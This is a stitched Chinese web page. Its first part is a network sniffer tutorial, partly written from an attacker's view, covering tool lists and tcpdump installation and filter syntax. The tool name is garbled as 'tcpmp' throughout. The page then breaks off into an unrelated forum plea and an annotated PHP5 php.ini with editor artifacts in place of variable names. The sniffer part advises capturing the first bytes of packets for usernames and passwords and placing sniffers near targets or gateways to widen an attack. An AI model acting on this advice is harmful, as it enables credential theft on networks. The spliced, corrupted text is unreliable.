每一個在LAN上的工作站都有其硬體地址。這些地址唯一地表示著網路上的機器（這一點於Internet地址系統比較相似）。當用戶發送一個報文時，這些報文就會發送到LAN上所有可用的機器。
在一般情況下，網路上所有的機器都可以「聽」到通過的流量，但對不屬於自己的報文則不予響應（換句話說，工作站A不會捕獲屬於工作站B的數據，而是簡單的忽略這些數據）。
如果某在工作站的網路介面處於雜收模式，那麼它就可以捕獲網路上所有的報文和幀，如果一個工作站被配置成這樣的方式，它（包括其軟體）就是一個嗅探器。
嗅探器可能造成的危害：
1.嗅探器能夠捕獲口令
2.能夠捕獲專用的或者機密的信息
3.可以用來危害網路鄰居的安全，或者用來獲取更高級別的訪問許可權
事實上，如果你在網路上存在非授權的嗅探器就以為著你的系統已經暴露在別人面前了。（大家可以試試天行2的嗅探功能）
一般我們只嗅探每個報文的前200到300個位元組。用戶名和口令都包含在這一部分中，這是我們關心的真正部分。工人，也可以嗅探給定介面上的所有報文，如果有足夠的空間進行存儲，有足夠的那裡進行處理的話，將會發現另一些非常有趣的東西……
簡單的放置一個嗅探器賓將其放到隨便什麼地方將不會起到什麼作用。將嗅探器放置於被攻擊機器或網路附近，這樣將捕獲到很多口令，還有一個比較好的方法就是放在網關上。如果這樣的話就能捕獲網路和其他網路進行身份鑒別的過程。這樣的方式將成倍地增加我們能夠攻擊的范圍。
三.誰會使用sniffers
可能誰都回知道誰會使用sniffer，但是並不是每個使用它的人都是網路高手，因為現在有很多的sniffer都成了傻瓜似的了，前段時間用的最多的不外乎oicq sniffer。我想那些喜歡查好友ip的朋友都應該記得它吧。呵呵，我都使用過它，現在當然不用了啊！
當然系統管理員使用sniffer來分析網路信息交通並且找出網路上何處發生問題。一個安全管理員可以同時用多種sniffer, 將它們放置在網路的各處,形成一個入侵警報系統。對於系統管理員來說sniffer是一個非常好的工具,但是它同樣是一個經常被黑客使用的工具.駭客安裝sniffer以獲得用戶名和賬號,信用卡號碼,個人信息,和其他的信息可以導致對你或是你的公司的極大危害如果向壞的方面發展。當它們得到這些信息後,駭客將使用密碼來進攻其他的internet 站點甚至倒賣信用卡號碼。
三.sniffer是如何在網路上實施的
談這個問題之前還應該先說一下Ethernet的通訊。通常在同一個網段的所有網路介面都有訪問在媒體上傳輸的所有數據的能力，而每個網路介面都還應該有一個硬體地址，該硬體地址不同於網路中存在的其它網路介面的硬體地址，同時，每個網路至少還要一個廣播地址。在正常情況下，一個合法的網路介面應該只響應這樣的兩種數據幀：
1�幀的目標區域具有和本地網路介面相匹配的硬體地址。

2�幀的目標區域具有「廣播地址」。

在接受到上面兩種情況的數據包時，網卡通過cpu產生一個硬體中斷。該中斷能引起操作系統注意，然後將幀中所包含的數據傳送給系統進一步處理。而sniffer就是一種能將本地網卡狀態設成雜亂模式（promiscuous Mode）的軟體。當網卡處於雜亂模式時，該網卡具備「廣播地址」，它對所有遇到的每一個幀都產生一個硬體中斷以提醒操作系統處理每一個報文包。（絕大多數的網卡具備設置成雜亂模式的能力。
可見，sniffer工作在網路環境中的底層，它會攔截所有的正在網路上傳送的數據。通過相應的軟體處理，可以實時分析這些數據的內容，進而分析所處的網路狀態和整體布局。值得注意的是：sniffer是極其安靜的，它是一種消極的安全攻擊。
四.哪裡可以得到sniffer
我們講的sniffer，主要是在unix系統下運用的，至於那些oicq sniffer就不在我們討論的范圍。
Sniffer是黑客們最常用的入侵手段之一。你可以在經過允許的網路中運行sniffer，了解它是如何有效地危及本地機器安全。
Sniffer可以是硬體，也可以是軟體。現在品種最多,應用最廣的是軟體Sniffer,絕大多數黑客們用的也是軟體Sniffer。
以下是一些也被廣泛用於調試網路故障的sniffer工具：
（一）.商用sniffer：
1. Network General.
Network General開發了多種產品。最重要的是Expert Sniffer，它不僅僅可以sniff，還能夠通過高性能的專門系統發送/接收數據包，幫助診斷故障。還有一個增強產品"Distrbuted Sniffer System"可以將UNIX工作站作為sniffer控制台，而將sniffer agents（代理）分布到遠程主機上。
2. Microsoft's Net Monitor
對於某些商業站點，可能同時需要運行多種協議--NetBEUI、IPX/SPX、TCP/IP、802.3和SNA等。這時很難找到一種sniffer幫助解決網路問題，因為許多sniffer往往將某些正確的協議數據包當成了錯誤數據包。Microsoft的Net Monitor（以前叫Bloodhound）可以解決這個難題。它能夠正確區分諸如Netware控制數據包、NT NetBios名字服務廣播等獨特的數據包。（etherfind只會將這些數據包標識為類型0000的廣播數據包。）這個工具運行在MS Windows 平台上。它甚至能夠按MAC地址（或主機名）進行網路統計和會話信息監視。只需簡單地單擊某個會話即可獲得tcpmp標準的輸出。過濾器設置也是最為簡單的，只要在一個對話框中單擊需要監視的主機即可。

（二）.免費軟體sniffer
1. Sniffit由Lawrence Berkeley 實驗室開發，運行於Solaris、SGI和Linux等平台。可以選擇源、目標地址或地址集合，還可以選擇監聽的埠、協議和網路介面等。這個SNIFFER默認狀態下只接受最先的400個位元組的信息包，這對於一次登陸會話進程剛剛好。
2. SNORT：這個SNIFFER有很多選項供你使用並可移植性強，可以記錄一些連接信息，用來跟蹤一些網路活動。
3. TCPDUMP：這個SNIFFER很有名，linux,FREEBSD還搭帶在系統上，是一個被很多UNIX高手認為是一個專業的網路管理工具，記得以前TsutomuShimomura（應該叫下村侵吧）就是使用他自己修改過的TCPDUMP版本來記錄了KEVINMITNICK攻擊他系統的記錄，後來就配合FBI抓住了KEVINMITNICK，後來他寫了一文：使用這些LOG記錄描述了那次的攻擊，
( http://www.attrition.org/security/newbie/security/sniffer/shimomur.txt )
4. ADMsniff:這是非常有名的ADM黑客集團寫的一個SNIFFER程序。
5. linsniffer:這是一個專門設計雜一LINUX平台上的SNIFFER。
6. Esniffer:這個也是一個比較有名的SNIFFER程序。
7. Solsniffer:這是個Solarissniffer，主要是修改了SunSniff專門用來可以方便的在Solair平台上編譯。
8. Ethereal是一基於GTK＋的一個圖形化Sniffer
9. Gobbler(for MS－DOS＆Win95)、Netman、NitWit、Ethload...等等。
（三）.UNIX下的sniffer
UNIX下的sniffer，我比較傾向於snoop.Snoop是按Solaris的標准製作的,雖然Snoop不像是Sniffer Pro那樣好,但是它是一個可定製性非常強的sniffer,在加上它是免費的(和Solaris附一起).誰能打敗它的地位?你可以在極短時間內抓獲一個信息包或是更加深的分析.如果你想學習如何使用snoop,看下面的url:
http://www.enteract.com/~lspitz/snoop.html
（四）.Linux下的sniffer工具
Linux下的sniffer工具，我推薦Tcpmp。
[1].tcpmp的安裝
在linux下tcpmp的安裝十分簡單，一般由兩種安裝方式。一種是以rpm包的形式來進行安裝。另外一種是以源程序的形式安裝。
1． rpm包的形式安裝
這種形式的安裝是最簡單的安裝方法，rpm包是將軟體編譯後打包成二進制的格式，通過rpm命令可以直接安裝，不需要修改任何東西。以超級用戶登錄，使用命令如下：
#rpm -ivh tcpmp-3_4a5.rpm
這樣tcpmp就順利地安裝到你的linux系統中。怎麼樣，很簡單吧。
2． 源程序的安裝
既然rpm包的安裝很簡單,為什麼還要採用比較復雜的源程序安裝呢?其實，linux一個最大的誘人之處就是在她上面有很多軟體是提供源程序的，人們可以修改源程序來滿足自己的特殊的需要。所以我特別建議朋友們都採取這種源程序的安裝方法。
· 第一步 取得源程序 在源程序的安裝方式中，我們首先要取得tcpmp的源程序分發包，這種分發包有兩種 形式，一種是tar壓縮包(tcpmp-3_4a5.tar.Z),另一種是rpm的分發包(tcpmp-3_4a5.src.rpm)。這兩種 形式的內容都是一樣的，不同的僅僅是壓縮的方式.tar的壓縮包可以使用如下命令解開：
#tar xvfz tcpmp-3_4a5.tar.Z
rpm的包可以使用如下命令安裝:
#rpm -ivh tcpmp-3_4a5.src.rpm
這樣就把tcpmp的源代碼解壓到/usr/src/redhat/SOURCES目錄下.

· 第二步 做好編譯源程序前的准備活動
在編譯源程序之前，最好已經確定庫文件libpcap已經安裝完畢，這個庫文件是tcpmp軟體所需的庫文件。同樣，你同時還要有一個標準的c語言編譯器。在linux下標準的c 語言編譯器一般是gcc。 在tcpmp的源程序目錄中。有一個文件是Makefile.in，configure命令就是從Makefile.in文件中自動產生Makefile文件。在Makefile.in文件中，可以根據系統的配置來修改BINDEST 和 MANDEST 這兩個宏定義，預設值是
BINDEST = @sbindir @
MANDEST = @mandir @
第一個宏值表明安裝tcpmp的二進制文件的路徑名，第二個表明tcpmp的man 幫助頁的路徑名,你可以修改它們來滿足系統的需求。

· 第三步 編譯源程序
使用源程序目錄中的configure腳本，它從系統中讀出各種所需的屬性。並且根據Makefile.in文件自動生成Makefile文件，以便編譯使用.make 命令則根據Makefile文件中的規則編譯tcpmp的源程序。使用make install命令安裝編譯好的tcpmp的二進制文件。
總結一下就是:
# tar xvfz tcpmp-3_4a5.tar.Z
# vi Makefile.in
# . /configure
# make
# make install

[2].Tcpmp的使用
tcpmp採用命令行方式，它的命令格式為：
tcpmp [ -adeflnNOpqStvx ] [ -c 數量 ] [ -F 文件名 ]
[ -i 網路介面 ] [ -r 文件名] [ -s snaplen ]
[ -T 類型 ] [ -w 文件名 ] [表達式 ]

1. tcpmp的選項介紹
-a 將網路地址和廣播地址轉變成名字；
-d 將匹配信息包的代碼以人們能夠理解的匯編格式給出；
-dd 將匹配信息包的代碼以c語言程序段的格式給出；
-ddd 將匹配信息包的代碼以十進制的形式給出；
-e 在輸出行列印出數據鏈路層的頭部信息；
-f 將外部的Internet地址以數字的形式列印出來；
-l 使標准輸出變為緩沖行形式；
-n 不把網路地址轉換成名字；
-t 在輸出的每一行不列印時間戳；
-v 輸出一個稍微詳細的信息，例如在ip包中可以包括ttl和服務類型的信息；
-vv 輸出詳細的報文信息；
-c 在收到指定的包的數目後，tcpmp就會停止；
-F 從指定的文件中讀取表達式,忽略其它的表達式；
-i 指定監聽的網路介面；
-r 從指定的文件中讀取包(這些包一般通過-w選項產生)；
-w 直接將包寫入文件中，並不分析和列印出來；
-T 將監聽到的包直接解釋為指定的類型的報文，常見的類型有rpc （遠程過程 調用）和snmp（簡單網路管理協議；）

2. tcpmp的表達式介紹
表達式是一個正則表達式，tcpmp利用它作為過濾報文的條件，如果一個報文滿足表達式的條件，則這個報文將會被捕獲。如果沒有給出任何條件，則網路上所有的信息包將會被截獲。
在表達式中一般如下幾種類型的關鍵字，一種是關於類型的關鍵字，主要包括host，net，port, 例如 host 210.27.48.2，指明 210.27.48.2是一台主機，net 202.0.0.0 指明 202.0.0.0是一個網路地址，port 23 指明埠號是23。如果沒有指定類型，預設的類型是host.
第二種是確定傳輸方向的關鍵字，主要包括src , dst ,dst or src, dst and src ,這些關鍵字指明了傳輸的方向。舉例說明，src 210.27.48.2 ,指明ip包中源地址是210.27.48.2 , dst net 202.0.0.0 指明目的網路地址是202.0.0.0 。如果沒有指明方向關鍵字，則預設是src or dst關鍵字。
第三種是協議的關鍵字，主要包括fddi,ip ,arp,rarp,tcp,udp等類型。Fddi指明是在FDDI(分布式光纖數據介面網路)上的特定的網路協議，實際上它是"ether"的別名，fddi和ether具有類似的源地址和目的地址，所以可以將fddi協議包當作ether的包進行處理和分析。其他的幾個關鍵字就是指明了監聽的包的協議內容。如果沒有指定任何協議，則tcpmp將會監聽所有協議的信息包。
除了這三種類型的關鍵字之外，其他重要的關鍵字如下：gateway, broadcast,less,greater,還有三種邏輯運算，取非運算是 'not ' '! ', 與運算是'and','&&';或運算 是'or' ,''；
這些關鍵字可以組合起來構成強大的組合條件來滿足人們的需要，下面舉幾個例子來說明。
(1)想要截獲所有210.27.48.1 的主機收到的和發出的所有的數據包：
#tcpmp host 210.27.48.1
(2) 想要截獲主機210.27.48.1 和主機210.27.48.2 或210.27.48.3的通信，使用命令：（在命令行中適用括弧時，一定要
#tcpmp host 210.27.48.1 and \ (210.27.48.2 or 210.27.48.3 \)
(3) 如果想要獲取主機210.27.48.1除了和主機210.27.48.2之外所有主機通信的ip包，使用命令：
#tcpmp ip host 210.27.48.1 and ! 210.27.48.2
(4)如果想要獲取主機210.27.48.1接收或發出的telnet包，使用如下命令：
#tcpmp tcp port 23 host 210.27.48.1

3. tcpmp 的輸出結果介紹
下面我們介紹幾種典型的tcpmp命令的輸出信息
(1) 數據鏈路層頭信息
使用命令#tcpmp --e host ice
ice 是一台裝有linux的主機，她的MAC地址是0：90：27：58：AF：1A
H219是一台裝有SOLARIC的SUN工作站，它的MAC地址是8：0：20：79：5B：46；上一條命令的輸出結果如下所示：
21:50:12.847509 eth0 < 8:0:20:79:5b:46 0:90:27:58:af:1a ip 60: h219.33357 > ice.telne
t 0:0(0) ack 22535 win 8760 (DF)
分析：21：50：12是顯示的時間， 847509是ID號，eth0 <表示從網路介面eth0 接受該數據包，eth0 >表示從網路介面設備發送數據包, 8:0:20:79:5b:46是主機H219的MAC地址,它表明是從源地址H219發來的數據包. 0:90:27:58:af:1a是主機ICE的MAC地址,表示該數據包的目的地址是ICE . ip 是表明該數據包是IP數據包,60 是數據包的長度, h219.33357 > ice.telnet 表明該數據包是從主機H219的33357埠發往主機ICE的TELNET(23)埠. ack 22535 表明對序列號是222535的包進行響應. win 8760表明發送窗口的大小是8760.

(2) ARP包的TCPDUMP輸出信息
使用命令#tcpmp arp
得到的輸出結果是：
22:32:42.802509 eth0 > arp who-has route tell ice (0:90:27:58:af:1a)
22:32:42.802902 eth0 < arp reply route is-at 0:90:27:12:10:66 (0:90:27:58:af:1a)
分析: 22:32:42是時間戳, 802509是ID號, eth0 >表明從主機發出該數據包, arp表明是ARP請求包, who-has route tell ice表明是主機ICE請求主機ROUTE的MAC地址。 0:90:27:58:af:1a是主機ICE的MAC地址。

(3) TCP包的輸出信息
用TCPDUMP捕獲的TCP包的一般輸出信息是：
src > dst: flags data-seqno ack window urgent options
src > dst:表明從源地址到目的地址, flags是TCP包中的標志信息,S 是SYN標志, F (FIN), P (PUSH) , R (RST) "." (沒有標記); data-seqno是數據包中的數據的順序號, ack是下次期望的順序號, window是接收緩存的窗口大小, urgent表明數據包中是否有緊急指針. Options是選項.

(4) UDP包的輸出信息
用TCPDUMP捕獲的UDP包的一般輸出信息是：
route.port1 > ice.port2: udp lenth
UDP十分簡單，上面的輸出行表明從主機ROUTE的port1埠發出的一個UDP數據包到主機ICE的port2埠，類型是UDP， 包的長度是lenth上面，我就詳細介紹了TCPDUMP的安裝和使用，希望會對大家有所幫助。如果想要熟練運用TCPDUMP這個LINUX環境下的SNIFFER利器，還需要大家在實踐中總結經驗，充分發揮它的威力。
（五）.windows平台上的sniffer
我推薦netxray和sniffer pro軟體，想必大家都用過他們，不過我在這兒還要再簡單介紹一下他們。
netxray的使用說明
1.1.1.1----2.2.2.2----3.3.3.3----4.4.4.4 這是一個ShareHub連接下的區域網

5.5.5.5 這是一個8080埠上的http/ftp proxy

Internet

啟動Capture，

⑷ 誰來幫幫我！

下面是PHP5中PHP.INI中文詳細配置，你試試

;;;;;;;;;;;;;;
;; Apache ;;
;;;;;;;;;;;;;;
[Apache]
; 僅在將PHP作為Apache模塊時才有效。

engine = On
; 是否啟用PHP解析引擎。
; 可以在httpd.conf中基於目錄或者虛擬主機來打開或者關閉PHP解析引擎。

last_modified = Off
; 是否在Last-Modified應答頭中放置該PHP腳本的最後修改時間。

xbithack = Off
; 是否不管文件結尾是什麼，都作為PHP可執行位組來解析。

child_terminate = Off
; PHP腳本在請求結束後是否允許使用apache_child_terminate()函數終止子進程。
; 該指令僅在UNIX平台上將PHP安裝為Apache1.3的模塊時可用。其他情況下皆不存在。

;;;;;;;;;;;;;;;
;; PHP核心 ;;
;;;;;;;;;;;;;;;

[PHP-Core-DateTime]
; 前四個配置選項目前僅用於date_sunrise()和date_sunset()函數。

date.default_latitude = 31.7667
; 默認緯度

date.default_longitude = 35.2333
; 默認經度

date.sunrise_zenith = 90.583333
; 默認日出天頂

date.sunset_zenith = 90.583333
; 默認日落天頂

date.timezone =
; 未設定TZ環境變數時用於所有日期和時間函數的默認時區。
; 中國大陸應當使用"PRC"
; 應用時區的優先順序為：
; 1. 用date_default_timezone_set()函數設定的時區(如果設定了的話)
; 2. TZ 環境變數(如果非空的話)
; 3. 該指令的值(如果設定了的話)
; 4. PHP自己推測(如果操作系統支持)
; 5. 如果以上都不成功，則使用 UTC

[PHP-Core-Assert]

assert.active = On
; 是否啟用assert()斷言評估

assert.l = Off
; 是否在發生失敗斷言時中止腳本的執行

assert.callback =
; 發生失敗斷言時執行的回調函數

assert.quiet_eval = Off
; 是否使用安靜評估(不顯示任何錯誤信息，相當於error_reporting=0)。
; 若關閉則在評估斷言表達式的時候使用當前的error_reporting指令值。

assert.warning = On
; 是否對每個失敗斷言都發出警告

[PHP-Core-SafeMode]
; 安全模式是為了解決共享伺服器的安全問題而設立的。
; 但試圖在PHP層解決這個問題在結構上是不合理的，
; 正確的做法應當是修改web伺服器層和操作系統層。
; 因此在PHP6中廢除了安全模式，並打算使用open_basedir指令取代之。

safe_mode = Off
;SYS
; 是否啟用安全模式。
; 打開時，PHP將檢查當前腳本的擁有者是否和被操作的文件的擁有者相同，
; 相同則允許操作，不同則拒絕操作。

safe_mode_gid = Off
;SYS
; 在安全模式下，默認在訪問文件時會做UID比較檢查。
; 但有些情況下嚴格的UID檢查反而是不適合的，寬松的GID檢查已經足夠。
; 如果你想將其放寬到僅做GID比較，可以打開這個參數。

safe_mode_allowed_env_vars = "PHP_"
;SYS
; 在安全模式下，用戶僅可以更改的環境變數的前綴列表(逗號分隔)。
; 允許用戶設置某些環境變數，可能會導致潛在的安全漏洞。
; 注意: 如果這一參數值為空，PHP將允許用戶更改任意環境變數！

safe_mode_protected_env_vars = "LD_LIBRARY_PATH"
;SYS
; 在安全模式下，用戶不能更改的環境變數列表(逗號分隔)。
; 這些變數即使在safe_mode_allowed_env_vars指令設置為允許的情況下也會得到保護。

safe_mode_exec_dir = "/usr/local/php/bin"
;SYS
; 在安全模式下，只有該目錄下的可執行程序才允許被執行系統程序的函數執行。
; 這些函數是：system, escapeshellarg, escapeshellcmd, exec, passthru,
; proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec

safe_mode_include_dir =
;SYS
; 在安全模式下，該組目錄和其子目錄下的文件被包含時，將跳過UID/GID檢查。
; 換句話說，如果此處的值為空，任何UID/GID不符合的文件都不允許被包含。
; 這里設置的目錄必須已經存在於include_path指令中或者用完整路徑來包含。
; 多個目錄之間用冒號(Win下為分號)隔開。
; 指定的限制實際上是一個前綴，而非一個目錄名，
; 也就是說"/dir/incl"將允許訪問"/dir/include"和"/dir/incls"
; 如果您希望將訪問控制在一個指定的目錄，那麼請在結尾加上斜線。

sql.safe_mode = Off
;SYS
; 是否使用SQL安全模式。
; 如果打開，指定默認值的資料庫連接函數將會使用這些默認值代替支持的參數。
; 對於每個不同資料庫的連接函數，其默認值請參考相應的手冊頁面。

[PHP-Core-Safe]

allow_url_fopen = On
;ini
; 是否允許打開遠程文件

allow_url_include = Off
;SYS
; 是否允許include/require遠程文件。

disable_classes =
;ini
; 該指令接受一個用逗號分隔的類名列表，以禁用特定的類。

disable_functions =
;ini
; 該指令接受一個用逗號分隔的函數名列表，以禁用特定的函數。

enable_dl = On
;SYS
; 是否允許使用dl()函數。dl()函數僅在將PHP作為apache模塊安裝時才有效。
; 禁用dl()函數主要是出於安全考慮，因為它可以繞過open_basedir指令的限制。
; 在安全模式下始終禁用dl()函數，而不管此處如何設置。

expose_php = On
;ini
; 是否暴露PHP被安裝在伺服器上的事實(在http頭中加上其簽名)。
; 它不會有安全上的直接威脅，但它使得客戶端知道伺服器上安裝了PHP。

open_basedir =
;SYS
; 將PHP允許操作的所有文件(包括文件自身)都限制在此組目錄列表下。
; 當一個腳本試圖打開一個指定目錄樹之外的文件時，將遭到拒絕。
; 所有的符號連接都會被解析，所以不可能通過符號連接來避開此限制。
; 特殊值'.'指定了存放該腳本的目錄將被當做基準目錄。
; 但這有些危險，因為腳本的工作目錄可以輕易被chdir()改變。
; 對於共享伺服器，在httpd.conf中靈活設置該指令將變得非常有用。
; 在Windows中用分號分隔目錄，UNIX系統中用冒號分隔目錄。
; 作為Apache模塊時，父目錄中的open_basedir路徑將自動被繼承。
; 指定的限制實際上是一個前綴，而非一個目錄名，
; 也就是說"/dir/incl"將允許訪問"/dir/include"和"/dir/incls"，
; 如果您希望將訪問控制在一個指定的目錄，那麼請在結尾加上一個斜線。
; 默認是允許打開所有文件。

[PHP-Core-Error]

error_reporting = E_ALL & ~E_NOTICE
; 錯誤報告級別是位欄位的疊加，推薦使用 E_ALL | E_STRICT
; 1 E_ERROR 致命的運行時錯誤
; 2 E_WARNING 運行時警告(非致命性錯誤)
; 4 E_PARSE 編譯時解析錯誤
; 8 E_NOTICE 運行時提醒(經常是bug，也可能是有意的)
; 16 E_CORE_ERROR PHP啟動時初始化過程中的致命錯誤
; 32 E_CORE_WARNING PHP啟動時初始化過程中的警告(非致命性錯)
; 64 E_COMPILE_ERROR 編譯時致命性錯
; 128 E_COMPILE_WARNING 編譯時警告(非致命性錯)
; 256 E_USER_ERROR 用戶自定義的致命錯誤
; 512 E_USER_WARNING 用戶自定義的警告(非致命性錯誤)
; 1024 E_USER_NOTICE 用戶自定義的提醒(經常是bug，也可能是有意的)
; 2048 E_STRICT 編碼標准化警告(建議如何修改以向前兼容)
; 4096 E_RECOVERABLE_ERROR 接近致命的運行時錯誤，若未被捕獲則視同E_ERROR
; 6143 E_ALL 除E_STRICT外的所有錯誤(PHP6中為8191,即包含所有)

track_errors = Off
; 是否在變數$php_errormsg中保存最近一個錯誤或警告消息。

display_errors = On
; 是否將錯誤信息作為輸出的一部分顯示。
; 在最終發布的web站點上，強烈建議你關掉這個特性，並使用錯誤日誌代替(參看下面)。
; 在最終發布的web站點打開這個特性可能暴露一些安全信息，
; 例如你的web服務上的文件路徑、資料庫規劃或別的信息。

display_startup_errors = Off
; 是否顯示PHP啟動時的錯誤。
; 即使display_errors指令被打開，關閉此參數也將不顯示PHP啟動時的錯誤。
; 建議你關掉這個特性，除非你必須要用於調試中。

report_memleaks = On
; 是否報告內存泄漏。這個參數只在以調試方式編譯的PHP中起作用，
; 並且必須在error_reporting指令中包含 E_WARNING

report_zend_debug = On
; 尚無說明文檔

html_errors = On
; 是否在出錯信息中使用HTML標記。
; 注意: 不要在發布的站點上使用這個特性！

docref_root = ;"http://localhost/phpmanual/"
docref_ext = ;".html"
; 如果打開了html_errors指令，PHP將會在出錯信息上顯示超連接，
; 直接鏈接到一個說明這個錯誤或者導致這個錯誤的函數的頁面。
; 你可以從http://www.php.net/docs.php下載php手冊，
; 並將docref_root指令指向你本地的手冊所在的URL目錄。
; 你還必須設置docref_ext指令來指定文件的擴展名(必須含有'.')。
; 注意: 不要在發布的站點上使用這個特性。

error_prepend_string = ;"<font color=#f00>"
; 用於錯誤信息前輸出的字元串
error_append_string = ;"</font>"
; 用於錯誤信息後輸出的字元串

xmlrpc_errors = Off
xmlrpc_error_number = 0
; 尚無文檔

[PHP-Core-Logging]

define_syslog_variables = Off
; 是否定義各種系統日誌變數，如：$LOG_PID, $LOG_CRON 等等。
; 關掉它以提高效率的好主意。
; 你可以在運行時調用define_syslog_variables()函數來定義這些變數。

error_log =
; 將錯誤日誌記錄到哪個文件中。該文件必須對Web伺服器用戶可寫。
; syslog 表示記錄到系統日誌中(NT下的事件日誌, Unix下的syslog(3))
; 如果此處未設置任何值，則錯誤將被記錄到Web伺服器的錯誤日誌中。

log_errors = Off
; 是否在日誌文件里記錄錯誤，具體在哪裡記錄取決於error_log指令。
; 強烈建議你在最終發布的web站點時使用日誌記錄錯誤而不是直接輸出，
; 這樣可以讓你既知道那裡出了問題，又不會暴露敏感信息。

log_errors_max_len = 1024
; 設置錯誤日誌中附加的與錯誤信息相關聯的錯誤源的最大長度。
; 這里設置的值對顯示的和記錄的錯誤以及$php_errormsg都有效。
; 設為 0 可以允許無限長度。

ignore_repeated_errors = Off
; 記錄錯誤日誌時是否忽略重復的錯誤信息。
; 錯誤信息必須出現在同一文件的同一行才被被視為重復。

ignore_repeated_source = Off
; 是否在忽略重復的錯誤信息時忽略重復的錯誤源。

[PHP-Core-Mail]
; 要使郵件函數可用，PHP必須在編譯時能夠訪問sendmail程序。
; 如果使用其它的郵件程序，如qmail或postfix，確保使用了相應的sendmail包裝。
; PHP首先會在系統的PATH環境變數中搜索sendmail，接著按以下順序搜索：
; /usr/bin:/usr/sbin:/usr/etc:/etc:/usr/ucblib:/usr/lib
; 強烈建議在PATH中能夠找到sendmail。
; 另外，編譯PHP的用戶必須能夠訪問sendmail程序。

SMTP = "localhost"
; mail()函數中用來發送郵件的SMTP伺服器的主機名稱或者IP地址。僅用於win32。

smtp_port = 25
; SMTP伺服器的埠號。僅用於win32。

sendmail_from =
; 發送郵件時使用的"From:"頭中的郵件地址。僅用於win32
; 該選項還同時設置了"Return-Path:"頭。

sendmail_path = "-t -i"
;SYS
; 僅用於unix，也可支持參數(默認的是'sendmail -t -i')
; sendmail程序的路徑，通常為"/usr/sbin/sendmail或/usr/lib/sendmail"。
; configure腳本會嘗試找到該程序並設定為默認值，但是如果失敗的話，可以在這里設定。
; 不使用sendmail的系統應將此指令設定為sendmail替代程序(如果有的話)。
; 例如，Qmail用戶通常可以設為"/var/qmail/bin/sendmail"或"/var/qmail/bin/qmail-inject"。
; qmail-inject 不需要任何選項就能正確處理郵件。

mail.force_extra_parameters =
; 作為額外的參數傳遞給sendmail庫的強制指定的參數附加值。
; 這些參數總是會替換掉mail()的第5個參數，即使在安全模式下也是如此。

[PHP-Core-ResourceLimit]

default_socket_timeout = 60
; 默認socket超時(秒)

max_execution_time = 30
; 每個腳本最大允許執行時間(秒)，0 表示沒有限制。
; 這個參數有助於阻止劣質腳本無休止的佔用伺服器資源。
; 該指令僅影響腳本本身的運行時間，任何其它花費在腳本運行之外的時間，
; 如用system()/sleep()函數的使用、資料庫查詢、文件上傳等，都不包括在內。
; 在安全模式下，你不能用ini_set()在運行時改變這個設置。

memory_limit = 16M
; 一個腳本所能夠申請到的最大內存位元組數(可以使用K和M作為單位)。
; 這有助於防止劣質腳本消耗完伺服器上的所有內存。
; 要能夠使用該指令必須在編譯時使用"--enable-memory-limit"配置選項。
; 如果要取消內存限制，則必須將其設為 -1 。
; 設置了該指令後，memory_get_usage()函數將變為可用。

max_input_time = -1
; 每個腳本解析輸入數據(POST, GET, upload)的最大允許時間(秒)。
; -1 表示不限制。

post_max_size = 8M
; 允許的POST數據最大位元組長度。此設定也影響到文件上傳。
; 如果POST數據超出限制，那麼___FCKpd___0

POST和
___FCKpd___0

FILES將會為空。
; 要上傳大文件，該值必須大於upload_max_filesize指令的值。
; 如果啟用了內存限制，那麼該值應當小於memory_limit指令的值。

realpath_cache_size = 16K
;SYS
; 指定PHP使用的realpath(規范化的絕對路徑名)緩沖區大小。
; 在PHP打開大量文件的系統上應當增大該值以提高性能。

realpath_cache_ttl = 120
;SYS
; realpath緩沖區中信息的有效期(秒)。
; 對文件很少變動的系統，可以增大該值以提高性能。

[PHP-Core-FileUpLoad]

file_uploads = On
;SYS
; 是否允許HTTP文件上傳。
; 參見upload_max_filesize, upload_tmp_dir, post_max_size指令

upload_max_filesize = 2M
; 允許上傳的文件的最大尺寸。

upload_tmp_dir =
;SYS
; 文件上傳時存放文件的臨時目錄(必須是PHP進程用戶可寫的目錄)。
; 如果未指定則PHP使用系統默認的臨時目錄。

[PHP-Core-MagicQuotes]
; PHP6將取消魔術引號，相當於下列指令全部為 Off

magic_quotes_gpc = On
; 是否對輸入的GET/POST/Cookie數據使用自動字元串轉義( ' " \ NULL )。
; 這里的設置將自動影響
___FCKpd___0

GEST
___FCKpd___0

POST
___FCKpd___0

COOKIE 數組的值。
; 若將本指令與magic_quotes_sybase指令同時打開，則僅將單引號(')轉義為('')，
; 其它特殊字元將不被轉義，即( " \ NULL )將保持原樣！！
; 建議關閉此特性，並使用自定義的過濾函數。

magic_quotes_runtime = Off
; 是否對運行時從外部資源產生的數據使用自動字元串轉義( ' " \ NULL )。
; 若打開本指令，則大多數函數從外部資源(資料庫,文本文件等)返回數據都將被轉義。
; 例如：用SQL查詢得到的數據，用exec()函數得到的數據，等等
; 若將本指令與magic_quotes_sybase指令同時打開，則僅將單引號(')轉義為('')，
; 其它特殊字元將不被轉義，即( " \ NULL )將保持原樣！！
; 建議關閉此特性，並視具體情況使用自定義的過濾函數。

magic_quotes_sybase = Off
; 是否採用Sybase形式的自動字元串轉義(用 '' 表示 ')

[PHP-Core-HighLight]

highlight.bg = "#FFFFFF"
highlight.comment = "#FF8000"
highlight.default = "#0000BB"
highlight.html = "#000000"
highlight.keyword = "#007700"
highlight.string = "#DD0000"
; 語法高亮模式的色彩(通常用於顯示 .phps 文件)。
; 只要能被<font color=xxx>接受的東西就能正常工作。

[PHP-Core-Langue]

short_open_tag = On
; 是否允許使用"<? ?>"短標識。否則必須使用"<?php ?>"長標識。
; 除非你的php程序僅在受控環境下運行，且只供自己使用，否則請不要使用短標記。
; 如果要和XML結合使用PHP，可以選擇關閉此選項以方便直接嵌入"<?xml ... ?>"，
; 不然你必須用PHP來輸出：<? echo '<?xml version="1.0"'; ?>
; 本指令也會影響到縮寫形式"<?="，它和"<? echo"等價，要使用它也必須打開短標記。

asp_tags = Off
; 是否允許ASP風格的標記"<% %>"，這也會影響到縮寫形式"<%="。
; PHP6中將刪除此指令

arg_separator.output = "&"
; PHP所產生的URL中用來分隔參數的分隔符。
; 另外還可以用"&"或","等等。

arg_separator.input = "&"
; PHP解析URL中的變數時使用的分隔符列表。
; 字元串中的每一個字元都會被當作分割符。
; 另外還可以用",&"等等。

allow_call_time_pass_reference = On
; 是否強迫在函數調用時按引用傳遞參數(每次使用此特性都會收到一條警告)。
; php反對這種做法，並在將來的版本里不再支持，因為它影響到了代碼的整潔。
; 鼓勵的方法是在函數聲明裡明確指定哪些參數按引用傳遞。
